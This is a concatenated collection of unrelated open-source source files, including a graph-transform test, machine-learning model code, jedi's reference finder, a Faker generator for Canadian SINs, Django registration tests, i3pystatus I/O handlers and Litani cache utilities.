(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
def test_hswish_with_min_max_different_tensors(self):
graph = build_graph_with_edge_attrs({
**regular_op('input', {'type': 'Parameter'}),
**regular_op('input_2', {'type': 'Parameter'}),
**regular_op('add', {'op': 'Add'}),
**regular_op('max', {'op': 'Maximum'}),
**regular_op('min', {'op': 'Minimum'}),
**regular_op('mul', {'op': 'Mul'}),
**regular_op('mul_2', {'op': 'Mul', 'name': 'final_mul'}),
**const('const_0', float_array([0.0])),
**const('const_3', float_array([3.0])),
**const('const_6', float_array([6.0])),
**const('const_1_6', float_array([1.0 / 6.0])),
**result('result'),
}, [('input_2', 'mul', {'in': 1, 'out': 0}),
('input', 'add', {'in': 0, 'out': 0}),
('const_3', 'add', {'in': 1, 'out': 0}),
('add', 'max', {'in': 0, 'out': 0}),
('const_0', 'max', {'in': 1, 'out': 0}),
('max', 'min', {'in': 0, 'out': 0}),
('const_6', 'min', {'in': 1, 'out': 0}),
('min', 'mul', {'in': 0, 'out': 0}),
('mul', 'mul_2', {'in': 0, 'out': 0}),
('const_1_6', 'mul_2', {'in': 1, 'out': 0}),
('mul_2', 'result', {'in': 0, 'out': 0})])
graph_ref = graph.copy()
graph.stage = 'front'
HSwishWithMinMax().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
|
tslearn/tests/test_svm.py | andriyor/tslearn | 1,151 | 11195436 | import numpy as np
from tslearn.metrics import cdist_gak
from tslearn.svm import TimeSeriesSVC, TimeSeriesSVR
__author__ = '<NAME> <EMAIL>'
def test_gamma_value_svm():
n, sz, d = 5, 10, 3
rng = np.random.RandomState(0)
time_series = rng.randn(n, sz, d)
labels = rng.randint(low=0, high=2, size=n)
gamma = 10.
for ModelClass in [TimeSeriesSVC, TimeSeriesSVR]:
gak_model = ModelClass(kernel="gak", gamma=gamma)
sklearn_X, _ = gak_model._preprocess_sklearn(time_series,
labels,
fit_time=True)
cdist_mat = cdist_gak(time_series, sigma=np.sqrt(gamma / 2.))
np.testing.assert_allclose(sklearn_X, cdist_mat)
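# Note (editorial addition): the assertion above relies on the correspondence
# sigma = sqrt(gamma / 2) between the SVM-style "gak" kernel parameter gamma
# and the bandwidth sigma expected by cdist_gak.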
def test_deprecated_still_work():
n, sz, d = 5, 10, 3
rng = np.random.RandomState(0)
X = rng.randn(n, sz, d)
y = rng.randint(low=0, high=2, size=n)
for ModelClass in [TimeSeriesSVC, TimeSeriesSVR]:
clf = ModelClass().fit(X, y)
np.testing.assert_equal(clf.support_vectors_time_series_().shape[1:],
X.shape[1:])
|
cms/test_utils/project/pluginapp/plugins/multicolumn/models.py | Mario-Kart-Felix/django-cms | 5,659 | 11195455 |
from cms.models import CMSPlugin
class MultiColumns(CMSPlugin):
"""
A plugin that has sub Column classes
"""
def __str__(self):
plugins = self.child_plugin_instances or []
return "{} columns".format(len(plugins))
|
code/model_part_pc.py | jeonghyunkeem/structurenet | 212 | 11195466 |
"""
This file defines part point cloud VAE/AE model.
"""
import torch
import torch.nn as nn
from chamfer_distance import ChamferDistance
from collections import namedtuple
class PartFeatSampler(nn.Module):
def __init__(self, feature_size, probabilistic=True):
super(PartFeatSampler, self).__init__()
self.probabilistic = probabilistic
self.mlp2mu = nn.Linear(feature_size, feature_size)
self.mlp2var = nn.Linear(feature_size, feature_size)
def forward(self, x):
mu = self.mlp2mu(x)
if self.probabilistic:
logvar = self.mlp2var(x)
std = logvar.mul(0.5).exp_()
eps = torch.randn_like(std)
kld = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)
return torch.cat([eps.mul(std).add_(mu), kld], 1)
else:
return mu
class PartEncoder(nn.Module):
def __init__(self, feat_len, probabilistic=False):
super(PartEncoder, self).__init__()
self.conv1 = nn.Conv1d(3, 64, 1)
self.conv2 = nn.Conv1d(64, 128, 1)
self.conv3 = nn.Conv1d(128, 128, 1)
self.conv4 = nn.Conv1d(128, feat_len, 1)
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(128)
self.bn4 = nn.BatchNorm1d(feat_len)
self.sampler = PartFeatSampler(feature_size=feat_len, probabilistic=probabilistic)
def forward(self, pc):
net = pc.transpose(2, 1)
net = torch.relu(self.bn1(self.conv1(net)))
net = torch.relu(self.bn2(self.conv2(net)))
net = torch.relu(self.bn3(self.conv3(net)))
net = torch.relu(self.bn4(self.conv4(net)))
net = net.max(dim=2)[0]
net = self.sampler(net)
return net
class PartDecoder(nn.Module):
def __init__(self, feat_len, num_point):
super(PartDecoder, self).__init__()
self.num_point = num_point
self.mlp1 = nn.Linear(feat_len, feat_len)
self.mlp2 = nn.Linear(feat_len, feat_len)
self.mlp3 = nn.Linear(feat_len, num_point*3)
self.bn1 = nn.BatchNorm1d(feat_len)
self.bn2 = nn.BatchNorm1d(feat_len)
self.chamferLoss = ChamferDistance()
def forward(self, net):
net = torch.relu(self.bn1(self.mlp1(net)))
net = torch.relu(self.bn2(self.mlp2(net)))
net = self.mlp3(net).view(-1, self.num_point, 3)
return net
def loss(self, pred, gt):
dist1, dist2 = self.chamferLoss(pred, gt)
loss = (dist1.mean(dim=1) + dist2.mean(dim=1)) / 2
avg_loss = loss.mean() * 1000
return avg_loss
|
networks/SPyNet/PYTHON_Flow2Color/computeColor.py | donegaci/memc-net | 145 | 11195475 |
import sys
import os
import time
import random
import subprocess as sp
# import cv2
import numpy as np
import matplotlib.pyplot as plt
from scipy.misc import imread, imsave, imshow, imresize
from skimage import color
def makeColorwheel():
RY = 15
YG = 6
GC = 4
CB = 11
BM = 13
MR = 6
ncols = RY + YG + GC + CB + BM + MR
colorwheel = np.zeros([ncols, 3]) # r g b
col = 0
# RY
colorwheel[0: RY, 0] = 255
colorwheel[0: RY, 1] = np.floor(255 * np.arange(0,RY) / RY)
col = col + RY
# YG
colorwheel[col : col + YG, 0] = 255 - np.floor(255 * np.arange(0,YG) / YG)
colorwheel[col : col + YG, 1] = 255
col = col + YG
# GC
colorwheel[col : col + GC, 1] = 255
colorwheel[col : col + GC, 2] = np.floor(255 * np.arange(0, GC ) / GC)
col = col + GC
# CB
colorwheel[col : col + CB, 1] = 255 - np.floor(255 * np.arange(0, CB ) / CB)
colorwheel[col : col + CB, 2] = 255
col = col + CB
# BM
colorwheel[col : col + BM, 2] = 255
colorwheel[col : col + BM, 0] = np.floor(255 * np.arange(0, BM ) / BM)
col = col + BM
# MR
colorwheel[col : col + MR, 2] = 255 - np.floor(255 * np.arange(0, MR ) / MR)
colorwheel[col : col + MR, 0] = 255
return colorwheel
def computeColor(u,v):
nanIdx = np.isnan(u) | np.isnan(v)
u[nanIdx] = 0
v[nanIdx] = 0
colorwheel = makeColorwheel()
ncols = colorwheel.shape[0]
rad = np.sqrt(u *u + v*v)
a = np.arctan2(-v,-u)/np.pi
fk = (a+1) / 2 * (ncols - 1)
k0 = np.int32(np.floor(fk))
k1 = k0 + 1
k1[k1==ncols] = 0
f = fk - k0
img = np.zeros([u.shape[0],u.shape[1],3])
for i in range(colorwheel.shape[1]):
temp = colorwheel[:,i]
col0 = temp[k0] / 255
col1 = temp[k1] / 255
col = (1-f) * col0 + f * col1
idx = rad <=1
col[idx] = 1 - rad[idx] * ( 1-col[idx])
idx = rad > 1
col[idx] = col[idx] *0.75
img[:,:,i] = np.uint8(np.floor(255*col *(1-nanIdx)).clip(0.0,255.0))
return img
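# Illustrative usage (editorial addition; the flow values are arbitrary):
# computeColor maps horizontal/vertical flow components (u, v) to the
# Middlebury-style color coding, where hue encodes direction and saturation
# encodes magnitude.
#
#   u = np.array([[0.5, -0.5]])
#   v = np.array([[0.0,  0.5]])
#   rgb = computeColor(u, v)   # H x W x 3 array of 0-255 color values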
if __name__ == '__main__':
cw = makeColorwheel()
|
venv/Lib/site-packages/jedi/inference/references.py | ajayiagbebaku/NFL-Model | 1,318 | 11195486 | <filename>venv/Lib/site-packages/jedi/inference/references.py
import os
import re
from parso import python_bytes_to_unicode
from jedi.debug import dbg
from jedi.file_io import KnownContentFileIO
from jedi.inference.names import SubModuleName
from jedi.inference.imports import load_module_from_path
from jedi.inference.filters import ParserTreeFilter
from jedi.inference.gradual.conversion import convert_names
_IGNORE_FOLDERS = ('.tox', '.venv', 'venv', '__pycache__')
_OPENED_FILE_LIMIT = 2000
"""
Stats from a 2016 Lenovo Notebook running Linux:
With os.walk, it takes about 10s to scan 11'000 files (without filesystem
caching). Once cached it only takes 5s. So it is expected that reading all
those files might take a few seconds, but not a lot more.
"""
_PARSED_FILE_LIMIT = 30
"""
For now we keep the amount of parsed files really low, since parsing might take
easily 100ms for bigger files.
"""
def _resolve_names(definition_names, avoid_names=()):
for name in definition_names:
if name in avoid_names:
# Avoiding recursions here, because goto on a module name lands
# on the same module.
continue
if not isinstance(name, SubModuleName):
# SubModuleNames are not actually existing names but created
# names when importing something like `import foo.bar.baz`.
yield name
if name.api_type == 'module':
yield from _resolve_names(name.goto(), definition_names)
def _dictionarize(names):
return dict(
(n if n.tree_name is None else n.tree_name, n)
for n in names
)
def _find_defining_names(module_context, tree_name):
found_names = _find_names(module_context, tree_name)
for name in list(found_names):
# Convert from/to stubs, because those might also be usages.
found_names |= set(convert_names(
[name],
only_stubs=not name.get_root_context().is_stub(),
prefer_stub_to_compiled=False
))
found_names |= set(_find_global_variables(found_names, tree_name.value))
for name in list(found_names):
if name.api_type == 'param' or name.tree_name is None \
or name.tree_name.parent.type == 'trailer':
continue
found_names |= set(_add_names_in_same_context(name.parent_context, name.string_name))
return set(_resolve_names(found_names))
def _find_names(module_context, tree_name):
name = module_context.create_name(tree_name)
found_names = set(name.goto())
found_names.add(name)
return set(_resolve_names(found_names))
def _add_names_in_same_context(context, string_name):
if context.tree_node is None:
return
until_position = None
while True:
filter_ = ParserTreeFilter(
parent_context=context,
until_position=until_position,
)
names = set(filter_.get(string_name))
if not names:
break
yield from names
ordered = sorted(names, key=lambda x: x.start_pos)
until_position = ordered[0].start_pos
def _find_global_variables(names, search_name):
for name in names:
if name.tree_name is None:
continue
module_context = name.get_root_context()
try:
method = module_context.get_global_filter
except AttributeError:
continue
else:
for global_name in method().get(search_name):
yield global_name
c = module_context.create_context(global_name.tree_name)
yield from _add_names_in_same_context(c, global_name.string_name)
def find_references(module_context, tree_name, only_in_module=False):
inf = module_context.inference_state
search_name = tree_name.value
# We disable flow analysis, because if we have ifs that are only true in
# certain cases, we want both sides.
try:
inf.flow_analysis_enabled = False
found_names = _find_defining_names(module_context, tree_name)
finally:
inf.flow_analysis_enabled = True
found_names_dct = _dictionarize(found_names)
module_contexts = [module_context]
if not only_in_module:
module_contexts.extend(
m for m in set(d.get_root_context() for d in found_names)
if m != module_context and m.tree_node is not None
)
# For param no search for other modules is necessary.
if only_in_module or any(n.api_type == 'param' for n in found_names):
potential_modules = module_contexts
else:
potential_modules = get_module_contexts_containing_name(
inf,
module_contexts,
search_name,
)
non_matching_reference_maps = {}
for module_context in potential_modules:
for name_leaf in module_context.tree_node.get_used_names().get(search_name, []):
new = _dictionarize(_find_names(module_context, name_leaf))
if any(tree_name in found_names_dct for tree_name in new):
found_names_dct.update(new)
for tree_name in new:
for dct in non_matching_reference_maps.get(tree_name, []):
# A reference that was previously searched for matches
# with a now found name. Merge.
found_names_dct.update(dct)
try:
del non_matching_reference_maps[tree_name]
except KeyError:
pass
else:
for name in new:
non_matching_reference_maps.setdefault(name, []).append(new)
result = found_names_dct.values()
if only_in_module:
return [n for n in result if n.get_root_context() == module_context]
return result
def _check_fs(inference_state, file_io, regex):
try:
code = file_io.read()
except FileNotFoundError:
return None
code = python_bytes_to_unicode(code, errors='replace')
if not regex.search(code):
return None
new_file_io = KnownContentFileIO(file_io.path, code)
m = load_module_from_path(inference_state, new_file_io)
if m.is_compiled():
return None
return m.as_context()
def gitignored_lines(folder_io, file_io):
ignored_paths = set()
ignored_names = set()
for l in file_io.read().splitlines():
if not l or l.startswith(b'#'):
continue
p = l.decode('utf-8', 'ignore')
if p.startswith('/'):
name = p[1:]
if name.endswith(os.path.sep):
name = name[:-1]
ignored_paths.add(os.path.join(folder_io.path, name))
else:
ignored_names.add(p)
return ignored_paths, ignored_names
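# Note (editorial addition): gitignored_lines implements only a small subset of
# .gitignore semantics. A pattern starting with "/" is resolved against the
# folder that contains the .gitignore and collected in ignored_paths (e.g.
# "/build/" -> <folder>/build); every other non-comment pattern, such as
# "*.pyc", is collected verbatim in ignored_names.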
def recurse_find_python_folders_and_files(folder_io, except_paths=()):
except_paths = set(except_paths)
for root_folder_io, folder_ios, file_ios in folder_io.walk():
# Delete folders that we don't want to iterate over.
for file_io in file_ios:
path = file_io.path
if path.suffix in ('.py', '.pyi'):
if path not in except_paths:
yield None, file_io
if path.name == '.gitignore':
ignored_paths, ignored_names = \
gitignored_lines(root_folder_io, file_io)
except_paths |= ignored_paths
folder_ios[:] = [
folder_io
for folder_io in folder_ios
if folder_io.path not in except_paths
and folder_io.get_base_name() not in _IGNORE_FOLDERS
]
for folder_io in folder_ios:
yield folder_io, None
def recurse_find_python_files(folder_io, except_paths=()):
for folder_io, file_io in recurse_find_python_folders_and_files(folder_io, except_paths):
if file_io is not None:
yield file_io
def _find_python_files_in_sys_path(inference_state, module_contexts):
sys_path = inference_state.get_sys_path()
except_paths = set()
yielded_paths = [m.py__file__() for m in module_contexts]
for module_context in module_contexts:
file_io = module_context.get_value().file_io
if file_io is None:
continue
folder_io = file_io.get_parent_folder()
while True:
path = folder_io.path
if not any(path.startswith(p) for p in sys_path) or path in except_paths:
break
for file_io in recurse_find_python_files(folder_io, except_paths):
if file_io.path not in yielded_paths:
yield file_io
except_paths.add(path)
folder_io = folder_io.get_parent_folder()
def get_module_contexts_containing_name(inference_state, module_contexts, name,
limit_reduction=1):
"""
Search a name in the directories of modules.
:param limit_reduction: Divides the limits on opening/parsing files by this
factor.
"""
# Skip non python modules
for module_context in module_contexts:
if module_context.is_compiled():
continue
yield module_context
# Very short names are not searched in other modules for now to avoid lots
# of file lookups.
if len(name) <= 2:
return
file_io_iterator = _find_python_files_in_sys_path(inference_state, module_contexts)
yield from search_in_file_ios(inference_state, file_io_iterator, name,
limit_reduction=limit_reduction)
def search_in_file_ios(inference_state, file_io_iterator, name, limit_reduction=1):
parse_limit = _PARSED_FILE_LIMIT / limit_reduction
open_limit = _OPENED_FILE_LIMIT / limit_reduction
file_io_count = 0
parsed_file_count = 0
regex = re.compile(r'\b' + re.escape(name) + r'\b')
for file_io in file_io_iterator:
file_io_count += 1
m = _check_fs(inference_state, file_io, regex)
if m is not None:
parsed_file_count += 1
yield m
if parsed_file_count >= parse_limit:
dbg('Hit limit of parsed files: %s', parse_limit)
break
if file_io_count >= open_limit:
dbg('Hit limit of opened files: %s', open_limit)
break
|
env/lib/python3.8/site-packages/faker/providers/ssn/en_CA/__init__.py | avdhari/enigma | 258 | 11195496 | # coding=utf-8
from __future__ import unicode_literals
from .. import Provider as SsnProvider
def checksum(sin):
"""
Determine validity of a Canadian Social Insurance Number.
    Validation is performed using a modified Luhn algorithm: every second
    digit of the SIN is doubled and the results are summed. If the total is
    a multiple of ten, the Social Insurance Number is considered valid.
https://en.wikipedia.org/wiki/Social_Insurance_Number
"""
# Remove spaces and create a list of digits.
checksumCollection = list(sin.replace(' ', ''))
checksumCollection = [int(i) for i in checksumCollection]
# Discard the last digit, we will be calculating it later.
checksumCollection[-1] = 0
# Iterate over the provided SIN and double every second digit.
# In the case that doubling that digit results in a two-digit
# number, then add the two digits together and keep that sum.
for i in range(1, len(checksumCollection), 2):
result = checksumCollection[i] * 2
if result < 10:
checksumCollection[i] = result
else:
checksumCollection[i] = result - 10 + 1
# The appropriate checksum digit is the value that, when summed
# with the first eight values, results in a value divisible by 10
check_digit = 10 - (sum(checksumCollection) % 10)
check_digit = (0 if check_digit == 10 else check_digit)
return check_digit
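# Worked example (editorial addition): for the commonly cited sample SIN
# "046 454 286", the digits with the last one zeroed are 0 4 6 4 5 4 2 8 0;
# doubling every second digit (summing the digits of two-digit results) gives
# 0 8 6 8 5 8 2 7 0, which sums to 44, so checksum("046 454 286") returns
# 10 - (44 % 10) = 6, matching the SIN's final digit.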
class Provider(SsnProvider):
# In order to create a valid SIN we need to provide a number that
# passes a simple modified Luhn Algorithm checksum.
#
# This function reverses the checksum steps to create a random
# valid nine-digit Canadian SIN (Social Insurance Number) in the
# format '### ### ###'.
def ssn(self):
# Create an array of 8 elements initialized randomly.
digits = self.generator.random.sample(range(9), 8)
# The final step of the validation requires that all of the
# digits sum to a multiple of 10. First, sum the first 8 and
# set the 9th to the value that results in a multiple of 10.
check_digit = 10 - (sum(digits) % 10)
check_digit = (0 if check_digit == 10 else check_digit)
digits.append(check_digit)
        # digits now holds the per-position Luhn contributions we want the
        # final SIN to have. The next step is to reverse the doubling that
        # the checksum applies to every other element.
for i in range(1, len(digits), 2):
if digits[i] % 2 == 0:
digits[i] = (digits[i] // 2)
else:
digits[i] = (digits[i] + 9) // 2
# Build the resulting SIN string.
sin = ""
for i in range(0, len(digits)):
sin += str(digits[i])
# Add a space to make it conform to Canadian formatting.
if i in (2, 5):
sin += " "
# Finally return our random but valid SIN.
return sin
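    # Usage sketch (illustrative, not part of the provider):
    #
    #     from faker import Faker
    #     fake = Faker('en_CA')
    #     sin = fake.ssn()                  # e.g. '046 454 286'
    #
    # The generated value always satisfies int(sin[-1]) == checksum(sin),
    # because ssn() builds the number by reversing the checksum steps.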
|
academicstoday_project/registration/tests.py | LeeDoona/EasyGrading | 146 | 11195550 | <filename>academicstoday_project/registration/tests.py<gh_stars>100-1000
from django.core.urlresolvers import resolve
from django.http import HttpRequest
from django.http import QueryDict
from django.test import TestCase
from django.test import Client
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
import json
from . import views
from captcha.models import CaptchaStore
# Constants
TEST_USER_EMAIL = "<EMAIL>"
TEST_USER_USERNAME = "Ledo"
TEST_USER_PASSWORD = "password"
class RegistrationTestCase(TestCase):
"""
python manage.py test registration
"""
def tearDown(self):
User.objects.all().delete()
def setUp(self):
captcha_count = CaptchaStore.objects.count()
self.failUnlessEqual(captcha_count, 0)
def test_url_resolves_to_register(self):
found = resolve('/register')
self.assertEqual(found.func, views.register)
    def test_register_with_successful_login(self):
        # Extra parameters to make this an Ajax-style request.
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
# Developer Notes:
# To get unit tests working with the django-simple-captcha then follow:
# http://stackoverflow.com/questions/3159284/how-to-unit-test-a-form-with-a-captcha-field-in-django
# Test
client = Client()
response = client.post('/register',{
'username': TEST_USER_USERNAME,
'password': <PASSWORD>,
'password_repeated': <PASSWORD>,
'first_name': 'Ledo',
'last_name': 'Dunno',
'email': TEST_USER_EMAIL,
'is_18_or_plus': True,
'captcha_0': 'dummy-value',
'captcha_1': 'PASSED',
},**kwargs)
# Verify: Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Verify: Successful response.
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'user registered')
self.assertEqual(array['status'], 'success')
# Verify: Database updated
try:
user = User.objects.get(email=TEST_USER_EMAIL)
except User.DoesNotExist:
user = None
self.assertEqual(user.username, TEST_USER_EMAIL) |
i3pystatus/core/io.py | fkusei/i3pystatus | 413 | 11195554 | import json
import signal
import sys
from contextlib import contextmanager
from threading import Condition
from threading import Thread
from i3pystatus.core.modules import IntervalModule
class IOHandler:
def __init__(self, inp=sys.stdin, out=sys.stdout):
self.inp = inp
self.out = out
def write_line(self, message):
"""Unbuffered printing to stdout."""
self.out.write(message + "\n")
self.out.flush()
def read(self):
"""Iterate over all input lines (Generator)"""
while True:
try:
yield self.read_line()
except EOFError:
return
def read_line(self):
"""
Interrupted respecting reader for stdin.
Raises EOFError if the end of stream has been reached
"""
try:
line = self.inp.readline().strip()
except KeyboardInterrupt:
raise EOFError()
# i3status sends EOF, or an empty line
if not line:
raise EOFError()
return line
class StandaloneIO(IOHandler):
"""
I/O handler for standalone usage of i3pystatus (w/o i3status)
    Writing works as usual, but reading will always return an empty JSON array,
    and the i3bar protocol header.
"""
n = -1
proto = [
{
"version": 1,
"click_events": True,
}, "[", "[]", ",[]",
]
def __init__(self, click_events, modules, keep_alive, interval=1):
"""
StandaloneIO instance must be created in main thread to be able to set
the SIGUSR1 signal handler.
"""
super().__init__()
self.interval = interval
self.modules = modules
self.proto[0]['click_events'] = click_events
if keep_alive:
self.proto[0].update(dict(stop_signal=signal.SIGUSR2,
cont_signal=signal.SIGUSR2))
signal.signal(signal.SIGUSR2, self.suspend_signal_handler)
self.proto[0] = json.dumps(self.proto[0])
self.refresh_cond = Condition()
self.treshold_interval = 20.0
self.stopped = False
signal.signal(signal.SIGUSR1, self.refresh_signal_handler)
def read(self):
self.compute_treshold_interval()
self.refresh_cond.acquire()
while True:
try:
self.refresh_cond.wait(timeout=self.interval)
except KeyboardInterrupt:
self.refresh_cond.release()
return
yield self.read_line()
def read_line(self):
self.n += 1
return self.proto[min(self.n, len(self.proto) - 1)]
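    # Illustration of the sequence read_line() produces with the default
    # header: the first read returns the JSON-encoded header dict, the
    # second "[", the third "[]", and every read after that ",[]", which is
    # exactly the endless-array framing the i3bar protocol expects.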
def compute_treshold_interval(self):
"""
Current method is to compute average from all intervals.
"""
intervals = [m.interval for m in self.modules if hasattr(m, "interval")]
if len(intervals) > 0:
self.treshold_interval = round(sum(intervals) / len(intervals))
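    # For instance, three modules with intervals 5, 30 and 300 seconds give
    # round(335 / 3) == 112, so only modules whose interval exceeds 112s get
    # their own refresh thread in refresh_signal_handler().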
def async_refresh(self):
"""
Calling this method will send the status line to i3bar immediately
without waiting for timeout (1s by default).
"""
self.refresh_cond.acquire()
self.refresh_cond.notify()
self.refresh_cond.release()
def refresh_signal_handler(self, signo, frame):
"""
This callback is called when SIGUSR1 signal is received.
It updates outputs of all modules by calling their `run` method.
Interval modules are updated in separate threads if their interval is
        above a certain threshold value.
        This threshold is computed by the :func:`compute_treshold_interval`
        method.
The reasoning is that modules with larger intervals also usually take
longer to refresh their output and that their output is not required in
'real time'.
This also prevents possible lag when updating all modules in a row.
"""
if signo != signal.SIGUSR1:
return
for module in self.modules:
if hasattr(module, "interval"):
if module.interval > self.treshold_interval:
thread = Thread(target=module.run)
thread.start()
else:
module.run()
else:
module.run()
self.async_refresh()
def suspend_signal_handler(self, signo, frame):
"""
By default, i3bar sends SIGSTOP to all children when it is not visible (for example, the screen
sleeps or you enter full screen mode). This stops the i3pystatus process and all threads within it.
For some modules, this is not desirable. Thankfully, the i3bar protocol supports setting the "stop_signal"
and "cont_signal" key/value pairs in the header to allow sending a custom signal when these events occur.
Here we use SIGUSR2 for both "stop_signal" and "cont_signal" and maintain a toggle to determine whether
we have just been stopped or continued. When we have been stopped, notify the IntervalModule managers
that they should suspend any module that does not set the keep_alive flag to a truthy value, and when we
have been continued, notify the IntervalModule managers that they can resume execution of all modules.
"""
if signo != signal.SIGUSR2:
return
self.stopped = not self.stopped
if self.stopped:
[m.suspend() for m in IntervalModule.managers.values()]
else:
[m.resume() for m in IntervalModule.managers.values()]
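    # Toggle sketch: the first SIGUSR2 (i3bar hides the bar) sets
    # self.stopped and suspends interval modules that do not ask to be kept
    # alive; the next SIGUSR2 (the bar becomes visible again) clears the
    # flag and resumes them.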
class JSONIO:
def __init__(self, io, skiplines=2):
self.io = io
for i in range(skiplines):
self.io.write_line(self.io.read_line())
def read(self):
"""Iterate over all JSON input (Generator)"""
for line in self.io.read():
with self.parse_line(line) as j:
yield j
@contextmanager
def parse_line(self, line):
"""Parse a single line of JSON and write modified JSON back."""
prefix = ""
# ignore comma at start of lines
if line.startswith(","):
line, prefix = line[1:], ","
j = json.loads(line)
yield j
self.io.write_line(prefix + json.dumps(j))
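    # Round-trip example (illustrative): given the input line
    #     ,[{"full_text": "hello"}]
    # the leading comma is stripped, the decoded list is yielded to the
    # caller for in-place modification, and the result is written back with
    # the "," prefix restored.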
|
auto_derby/single_mode/race/__init__.py | DoctrineAlanK/auto-derby | 235 | 11195555 | import logging
from .game_data import (
find,
find_by_date,
find_by_race_detail_image,
find_by_race_menu_image,
reload,
reload_on_demand,
)
from .globals import g
from .race import Race
from .race_result import RaceResult
# Deprecated: remove at next major version
LOGGER = logging.getLogger(__name__)
|
uC/AVR/stuff/FreeRTOSv202107.00/FreeRTOS/Test/litani/lib/litani.py | 4lc0n/PinToWin | 369 | 11195564 | <gh_stars>100-1000
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import asyncio
import contextlib
import json
import logging
import os
import pathlib
import shutil
import sys
CACHE_FILE = "cache.json"
CACHE_POINTER = ".litani_cache_dir"
CI_STAGES = ["build", "test", "report"]
JOBS_DIR = "jobs"
RUN_FILE = "run.json"
TIME_FORMAT_R = "%Y-%m-%dT%H:%M:%SZ"
TIME_FORMAT_W = "%Y-%m-%dT%H:%M:%SZ"
TIME_FORMAT_MS = "%Y-%m-%dT%H:%M:%S.%fZ"
VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH = 1, 10, 0
VERSION = "%d.%d.%d" % (VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH)
class ExpireableDirectory:
"""This class is to mark directories as being safe for garbage collection"""
def __init__(self, path: pathlib.Path):
self._touchfile = path.resolve() / ".litani-expired"
def expire(self):
self._touchfile.touch()
def is_expired(self):
return self._touchfile.exists()
class AcquisitionFailed(Exception):
pass
class TimeoutExpired(Exception):
pass
class LockableDirectory:
"""POSIX-compliant directory locking"""
def __init__(self, path: pathlib.Path):
"""Directory is initially locked"""
self.path = path.resolve()
self._lock_file = self.path / ".litani-lock"
# Non-blocking =============================================================
def acquire(self):
"""Return True if acquisition was successful, False otherwise"""
try:
self._lock_file.unlink()
except OSError:
return False
else:
return True
def release(self):
self._lock_file.touch()
@contextlib.contextmanager
def try_acquire(self):
"""Automatically releases directory at the end of a block. Usage:
try:
with lock_dir.try_acquire():
# do stuff with locked dir
except report_directories.AcquisitionFailed:
# deal with it
"""
if not self.acquire():
raise AcquisitionFailed("directory: '%s'" % self.path)
yield
self.release()
# Async ====================================================================
async def acquire_wait(self, timeout=0):
"""Block until acquisition succeeds or timeout expires"""
while True:
if self.acquire():
return
timeout -= 1
if timeout == 0:
raise TimeoutExpired(
"directory: '%s', timeout: %d" % (self.path, timeout))
await asyncio.sleep(1)
    @contextlib.asynccontextmanager
    async def try_acquire_wait(self, timeout=0):
        """Enter a context manager as soon as acquisition succeeds. Directory
        will be released upon exit from context manager. Usage:
            try:
                async with lock_dir.try_acquire_wait(timeout=10):
                    # do stuff with locked dir
            except report_directories.TimeoutExpired:
                # deal with it
        """
        await self.acquire_wait(timeout)
        yield
        self.release()
def _get_cache_dir(path=os.getcwd()):
def cache_pointer_dirs():
current = pathlib.Path(path).resolve(strict=True)
yield current
while current.parent != current:
current = current.parent
yield current
current = pathlib.Path(os.getcwd()).resolve(strict=True)
for root, _, dirs in os.walk(current):
for dyr in dirs:
yield pathlib.Path(os.path.join(root, dyr))
for possible_dir in cache_pointer_dirs():
logging.debug(
"Searching for cache pointer in %s", possible_dir)
possible_pointer = possible_dir / CACHE_POINTER
try:
if possible_pointer.exists():
logging.debug(
"Found a cache pointer at %s", possible_pointer)
with open(possible_pointer) as handle:
pointer = handle.read().strip()
possible_cache = pathlib.Path(pointer)
if possible_cache.exists():
logging.debug("cache is at %s", possible_cache)
return possible_cache
logging.warning(
"Found a cache file at %s pointing to %s, but that "
"directory does not exist. Continuing search...",
possible_pointer, possible_cache)
except PermissionError:
pass
logging.error(
"Could not find a pointer to a litani cache. Did you forget "
"to run `litani init`?")
raise FileNotFoundError
def get_cache_dir(path=os.getcwd()):
try:
return _get_cache_dir(path)
except FileNotFoundError:
sys.exit(1)
def get_report_dir():
return get_cache_dir() / "html"
def get_report_data_dir():
return get_cache_dir() / "report_data"
def get_artifacts_dir():
return get_cache_dir() / "artifacts"
def get_status_dir():
return get_cache_dir() / "status"
@contextlib.contextmanager
def atomic_write(path, mode="w"):
try:
parent = pathlib.Path(path).parent
parent.mkdir(exist_ok=True, parents=True)
tmp = "%s~" % path
# pylint: disable=consider-using-with
handle = open(tmp, mode)
yield handle
except RuntimeError:
try:
os.unlink(tmp)
except RuntimeError:
pass
else:
handle.flush()
handle.close()
try:
os.rename(tmp, path)
except RuntimeError:
os.unlink(tmp)
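# Usage sketch: atomic_write() is what keeps readers from ever seeing a
# half-written cache file; data goes to "<path>~" first and is renamed over
# the target only if the block completes, e.g.
#
#     with atomic_write(cache_dir / CACHE_FILE) as handle:
#         print(json.dumps(cache, indent=2), file=handle)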
def add_jobs_to_cache():
"""Adds individual Litani jobs in the jobs directory to the cache file
`litani add-job` adds jobs to individual JSON files so that it's possible to
run multiple parallel invocations of `litani add-job`. When all jobs have
been added, this method should be called so that all of the individual JSON
job files get added to the single cache file, ready to be run.
"""
jobs = []
cache_dir = get_cache_dir()
jobs_dir = cache_dir / JOBS_DIR
for job_file in os.listdir(jobs_dir):
with open(jobs_dir / job_file) as handle:
jobs.append(json.load(handle))
with open(cache_dir / CACHE_FILE) as handle:
cache = json.load(handle)
cache["jobs"] = jobs
with atomic_write(cache_dir / CACHE_FILE) as handle:
print(json.dumps(cache, indent=2), file=handle)
